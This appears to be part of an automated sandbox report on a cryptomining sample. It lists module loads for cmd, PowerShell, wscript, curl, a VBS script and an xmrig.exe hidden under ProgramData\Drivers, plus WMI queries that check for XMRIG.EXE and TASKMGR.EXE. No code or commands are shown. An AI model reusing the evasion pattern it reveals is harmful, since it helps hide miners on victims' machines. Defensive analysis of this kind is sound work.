Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: policymanager.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: msvcp110_win.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: pcacli.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Section loaded: sfc_os.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: mpr.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: framedynos.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: dbghelp.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: wbemcomn.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: winsta.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\find.exe |
Section loaded: ulib.dll |
|
Source: C:\Windows\System32\find.exe |
Section loaded: fsutilext.dll |
|
Source: C:\Windows\System32\timeout.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: mpr.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: framedynos.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: dbghelp.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: wbemcomn.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: winsta.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: iphlpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dnsapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dhcpcsvc6.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dhcpcsvc.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: winnsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rasapi32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rasman.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rtutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mswsock.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: winhttp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ondemandconnroutehelper.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rasadhlp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: fwpuclnt.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: apphelp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: mpr.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrrun.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: edputil.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.staterepositoryps.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: appresolver.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: bcp47langs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: slc.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sppc.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecorecommonproxystub.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecoreuapcommonproxystub.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: mpr.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: framedynos.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: dbghelp.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: wbemcomn.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: winsta.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\find.exe |
Section loaded: ulib.dll |
|
Source: C:\Windows\System32\find.exe |
Section loaded: fsutilext.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: cmdext.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: apphelp.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: iphlpapi.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: userenv.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: cryptbase.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: powrprof.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: umpdc.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: uxtheme.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: mswsock.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: dhcpcsvc6.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: dhcpcsvc.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: dnsapi.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: napinsp.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: pnrpnsp.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: wshbth.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: nlaapi.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: winrnr.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: explorerframe.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: cryptsp.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: rsaenh.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: rasadhlp.dll |
|
Source: C:\ProgramData\Drivers\xmrig.exe |
Section loaded: fwpuclnt.dll |
|
Source: C:\Windows\System32\timeout.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: mpr.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: framedynos.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: dbghelp.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: wbemcomn.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: winsta.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: mpr.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: framedynos.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: dbghelp.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: wbemcomn.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: winsta.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\tasklist.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\find.exe |
Section loaded: ulib.dll |
|
Source: C:\Windows\System32\find.exe |
Section loaded: fsutilext.dll |
|
Source: C:\Users\user\AppData\Roaming\1.exe |
Section loaded: apphelp.dll |
|
Source: C:\Users\user\AppData\Roaming\1.exe |
Section loaded: msvcp140.dll |
|
Source: C:\Users\user\AppData\Roaming\1.exe |
Section loaded: vcruntime140.dll |
|
Source: C:\Users\user\AppData\Roaming\1.exe |
Section loaded: vcruntime140_1.dll |
|
Source: C:\Users\user\AppData\Roaming\1.exe |
Section loaded: vcruntime140.dll |
|
Source: C:\Users\user\AppData\Roaming\1.exe |
Section loaded: vcruntime140_1.dll |
|
Source: C:\Users\user\AppData\Roaming\1.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Users\user\AppData\Roaming\1.exe |
Section loaded: secur32.dll |
|
Source: C:\Users\user\AppData\Roaming\1.exe |
Section loaded: sspicli.dll |
|
Source: C:\Users\user\AppData\Roaming\1.exe |
Section loaded: iphlpapi.dll |
|
Source: C:\Users\user\AppData\Roaming\1.exe |
Section loaded: mswsock.dll |
|
Source: C:\Users\user\AppData\Roaming\1.exe |
Section loaded: dnsapi.dll |
|
Source: C:\Users\user\AppData\Roaming\1.exe |
Section loaded: rasadhlp.dll |
|
Source: C:\Users\user\AppData\Roaming\1.exe |
Section loaded: fwpuclnt.dll |
|
Source: C:\Windows\System32\timeout.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: apphelp.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: version.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: dxgidebug.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: sfc_os.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: sspicli.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: rsaenh.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: uxtheme.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: dwmapi.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: cryptbase.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: riched20.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: usp10.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: msls31.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: kernel.appcore.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: windowscodecs.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: textshaping.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: textinputframework.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: coreuicomponents.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: coremessaging.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: ntmarta.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: wintypes.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: wintypes.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: wintypes.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: windows.storage.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: wldp.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: propsys.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: profapi.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: edputil.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: urlmon.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: iertutil.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: srvcli.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: netutils.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: windows.staterepositoryps.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: policymanager.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: msvcp110_win.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: appresolver.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: bcp47langs.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: slc.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: userenv.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: sppc.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: onecorecommonproxystub.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: onecoreuapcommonproxystub.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: pcacli.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: mpr.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: windows.fileexplorer.common.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: apphelp.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: ntshrui.dll |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Section loaded: cscapi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: mpr.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrrun.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: edputil.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.staterepositoryps.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: appresolver.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: bcp47langs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: slc.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sppc.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecorecommonproxystub.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecoreuapcommonproxystub.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: cmdext.dll |
|
Source: C:\Windows\System32\curl.exe |
Section loaded: secur32.dll |
|
Source: C:\Windows\System32\curl.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\curl.exe |
Section loaded: iphlpapi.dll |
|
Source: C:\Windows\System32\curl.exe |
Section loaded: mswsock.dll |
|
Source: C:\Windows\System32\curl.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\curl.exe |
Section loaded: dnsapi.dll |
|
Source: C:\Windows\System32\curl.exe |
Section loaded: rasadhlp.dll |
|
Source: C:\Windows\System32\curl.exe |
Section loaded: fwpuclnt.dll |
|
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE' |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE' |
Source: C:\Windows\System32\timeout.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XMRIG.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE' |
Source: C:\Windows\System32\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE' |
Source: C:\Windows\System32\find.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE' |
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'TASKMGR.EXE' |
Source: C:\Windows\System32\wscript.exe |
